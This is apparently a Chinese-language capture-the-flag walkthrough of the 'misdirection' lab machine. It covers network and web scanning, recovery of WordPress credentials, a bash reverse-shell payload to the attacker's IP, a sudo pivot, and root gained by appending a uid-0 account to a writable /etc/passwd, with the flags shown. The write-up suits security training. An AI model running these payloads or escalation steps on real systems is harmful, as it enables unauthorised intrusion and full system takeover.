信息收集
1、arp
┌──(root?ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.147 00:50:56:2b:59:b0 VMware, Inc.
192.168.12.254 00:50:56:e0:37:90 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 4 240 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.147 00:50:56:2b:59:b0 1 60 VMware, Inc.
192.168.12.254 00:50:56:e0:37:90 1 60 VMware, Inc.
3、nmap
端口探测
┌──(root?ru)-[~/kali]
└─# nmap -p- 192.168.12.147 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 17:11 CST
Nmap scan report for 192.168.12.147
Host is up (0.0012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:50:56:36:4D:9A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds
┌──(root?ru)-[~/kali]
└─# cat port.nmap | head -n 9 | tail -n 4 | awk '{print $1}' | awk -F "/" '{print $1}' | xargs -n 4 | sed 's/ /,/g'
22,80,3306,8080
信息探测
┌──(root?ru)-[~/kali]
└─# nmap -sVC -O -p 22,80,3306,8080 192.168.12.147 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 17:15 CST
Nmap scan report for 192.168.12.147
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:bb:44:ee:f3:33:af:9f:a5:ce:b5:77:61:45:e4:36 (RSA)
| 256 67:7b:cb:4e:95:1b:78:08:8d:2a:b1:47:04:8d:62:87 (ECDSA)
|_ 256 59:04:1d:25:11:6d:89:a3:6c:6d:e4:e3:d2:3c:da:7d (ED25519)
80/tcp open http Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:50:56:36:4D:9A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.85 seconds
4、whatweb
┌──(root?ru)-[~/kali]
└─# whatweb http://192.168.12.147
http://192.168.12.147 [200 OK] Cookies[session_id_init], Country[RESERVED][ZZ], HTTPServer[Rocket 1.2.6 Python/2.7.15rc1], HttpOnly[session_id_init], IP[192.168.12.147], JQuery, Meta-Author[Massimo Di pierro], Python[2.7.15rc1], Script[text/javascript], Web2py[web2py], X-Powered-By[web2py], X-UA-Compatible[IE=edge]
5、nikto
┌──(root?ru)-[~/kali]
└─# nikto -h 192.168.12.147
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.147
+ Target Hostname: 192.168.12.147
+ Target Port: 80
+ Start Time: 2023-12-28 17:18:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Rocket 1.2.6 Python/2.7.15rc1
+ /: RFC-1918 IP address found in the 'session_id_init' cookie. The IP is "192.168.12.128".
+ /: Retrieved x-powered-by header: web2py.
+ RFC-1918 /: IP address found in the 'set-cookie' header. The IP is "192.168.12.128". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /jgF0uhHe.php4: Uncommon header 'web2py_error' found, with contents: invalid path.
+ : Server banner changed from 'Rocket 1.2.6 Python/2.7.15rc1' to 'Apache/2.4.29 (Ubuntu)'.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-12-28 17:20:30 (GMT8) (92 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
80端口信息探测
经过探测,80端口没啥用
8080端口信息探测
目录探测
┌──(root?ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.147:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.147:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 324] [--> http://192.168.12.147:8080/images/]
/help (Status: 301) [Size: 322] [--> http://192.168.12.147:8080/help/]
/scripts (Status: 301) [Size: 325] [--> http://192.168.12.147:8080/scripts/]
/css (Status: 301) [Size: 321] [--> http://192.168.12.147:8080/css/]
/wordpress (Status: 301) [Size: 327] [--> http://192.168.12.147:8080/wordpress/]
/development (Status: 301) [Size: 329] [--> http://192.168.12.147:8080/development/]
/manual (Status: 301) [Size: 324] [--> http://192.168.12.147:8080/manual/]
/js (Status: 301) [Size: 320] [--> http://192.168.12.147:8080/js/]
/shell (Status: 301) [Size: 323] [--> http://192.168.12.147:8080/shell/]
/debug (Status: 301) [Size: 323] [--> http://192.168.12.147:8080/debug/]
/server-status (Status: 403) [Size: 281]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
┌──(root?ru)-[~/kali]
└─# dirsearch -u http://192.168.12.147:8080 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.12.147_8080/_23-12-29_11-20-50.txt
Target: http://192.168.12.147:8080/
[11:20:50] Starting:
[11:20:50] 301 - 320B - /js -> http://192.168.12.147:8080/js/
[11:21:04] 301 - 321B - /css -> http://192.168.12.147:8080/css/
[11:21:04] 200 - 3KB - /debug/
[11:21:04] 301 - 323B - /debug -> http://192.168.12.147:8080/debug/
[11:21:05] 200 - 408B - /development/
[11:21:08] 301 - 322B - /help -> http://192.168.12.147:8080/help/
[11:21:08] 200 - 407B - /help/
[11:21:08] 301 - 324B - /images -> http://192.168.12.147:8080/images/
[11:21:08] 200 - 408B - /images/
[11:21:09] 200 - 407B - /js/
[11:21:11] 301 - 324B - /manual -> http://192.168.12.147:8080/manual/
[11:21:18] 200 - 407B - /scripts/
[11:21:18] 301 - 325B - /scripts -> http://192.168.12.147:8080/scripts/
[11:21:18] 301 - 323B - /shell -> http://192.168.12.147:8080/shell/
[11:21:18] 200 - 408B - /shell/
[11:21:26] 200 - 4KB - /wordpress/
[11:21:26] 200 - 1KB - /wordpress/wp-login.php
Task Completed
web探测
在8080端口的debug目录下找到关键线索!
在网站目录下找到了wordpress的登陆账号和密码!
blog : abcdefghijklmnopqrstuv
反弹shell
直接反弹shell
payload
/bin/bash -c 'bash -i >&/dev/tcp/192.168.12.128/5656 0>&1'
提权
系统信息收集
www-data@misdirection:/home/brexit$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
www-data@misdirection:/home/brexit$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
id
uid=1000(brexit) gid=1000(brexit) groups=1000(brexit),24(cdrom),30(dip),46(plugdev),108(lxd)
ls
start-vote.sh
user.txt
web2py
cat user.txt
404b9193154be7fbbc56d7534cb26339
发现sudo -l 可以进行提权到用户brexit ,并且找到了第一个flag!
brexit@misdirection:~$ ls -al
ls -al
total 60
drwxr-xr-x 6 brexit brexit 4096 Jun 1 2019 .
drwxr-xr-x 3 root root 4096 Jun 1 2019 ..
-rw------- 1 brexit brexit 0 Jun 1 2019 .bash_history
-rw-r--r-- 1 brexit brexit 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 brexit brexit 3771 Apr 4 2018 .bashrc
drwx------ 3 brexit brexit 4096 Jun 1 2019 .cache
drwx------ 3 brexit brexit 4096 Jun 1 2019 .gnupg
drwxrwxr-x 3 brexit brexit 4096 Jun 1 2019 .local
-rw-r--r-- 1 brexit brexit 807 Apr 4 2018 .profile
-rw-rw-r-- 1 brexit brexit 66 Jun 1 2019 .selected_editor
-rw------- 1 brexit brexit 9346 Jun 1 2019 .viminfo
-rwxrwxr-x 1 brexit brexit 90 Jun 1 2019 start-vote.sh
-r--r----- 1 brexit brexit 33 Jun 1 2019 user.txt
drwxrwxr-x 16 brexit brexit 4096 Dec 28 09:11 web2py
brexit@misdirection:~$
brexit@misdirection:~$ ls -al /etc/passwd /etc/shadow
ls -al /etc/passwd /etc/shadow
-rwxrwxr-- 1 root brexit 1617 Jun 1 2019 /etc/passwd
-rw-r----- 1 root shadow 1053 Jun 1 2019 /etc/shadow
从/etc/passwd 权限来看,我们可以直接写入一个具有root权限的账号即可提权!
本地提权
┌──(root?ru)-[~/kali]
└─# openssl passwd -1 -salt hack hack > hash.txt
┌──(root?ru)-[~/kali]
└─# cat hash.txt
$1$hack$xR6zsfvpez/t8teGRRSNr.
┌──(root?ru)-[~/kali]
└─# hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash
首先使用openssl生成一个账号密码!
然后按照格式进行拼接!
brexit@misdirection:~$ echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash' >> /etc/passwd
<8teGRRSNr.:0:0:root:/root:/bin/bash' >> /etc/passwd
brexit@misdirection:~$ su hack
su hack
Password: hack
root@misdirection:/home/brexit# whoami
whoami
root
root@misdirection:/home/brexit#
get root and flag
root@misdirection:/home/brexit# cd /root
cd /root
root@misdirection:~# ls
ls
root.txt
root@misdirection:~# cat root.txt
cat root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
root@misdirection: